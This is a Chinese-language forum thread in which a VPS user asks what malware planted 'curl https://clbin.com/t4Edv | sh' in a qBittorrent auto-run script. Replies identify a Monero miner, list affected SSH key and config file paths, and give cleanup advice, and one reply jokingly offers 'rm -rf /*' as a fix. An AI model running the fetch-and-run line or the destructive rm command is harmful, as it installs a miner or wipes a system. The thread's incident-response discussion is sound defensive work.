求大佬帮忙分析下中什么病毒了?

Debu9 6天前 4

vps上挂的qbtorrent今天查看所有种子都没了。
自动执行脚本里有 如下代码,没看明白是啥病毒,挖矿脚本?
curl https://clbin.com/t4Edv | sh
最新回复 (8)
  • 宣传 6天前
    引用 2
    rm -rf /* 一键杀毒
  • Slime 6天前
    引用 3
    门罗币挖矿,备份数据重装吧
  • Slime 6天前
    引用 4
  • W4ter 6天前
    引用 5
    稍等zsbd.......
  • Alicloud 6天前
    引用 6
    /root/.ssh/id_rsa.pub
    /root/.ssh/authorized_keys
    ~/.ssh/authorized_keys
    ~/.ssh/id_rsa.pub
    /tmp/rip
    /volsystem/httpd_server
    /volsystem/config.json
    /tmp/httpd_server
    /tmp/config.json
    删除这些文件,最好是重装吧,如果不能重装,安装个rootkits和clamav全盘杀毒,同时用netstat或lsof查询端口被占用和连接情况,看有无异常的连接。改个ssh登录端口和root登录密码,看用户组里有没有可疑用户
  • 楼主 Debu9 6天前
    引用 7
    谢谢各位大佬
  • 楼主 Debu9 6天前
    引用 8
    Alicloud 发表于 2021-1-13 09:19
    /root/.ssh/id_rsa.pub
    /root/.ssh/authorized_keys
    ~/.ssh/authorized_keys
    大佬,我检查了一下并没有这些文件。
    我思考了一下,可能是因为我的QB下载器是docker中的。
    入侵者只是进入了docker环境,并没进入我的宿主机。不知道我的想法对不对?
  • siyun77 6天前
    引用 9
    这个我之前解决过,很简单
  • 游客
    10
返回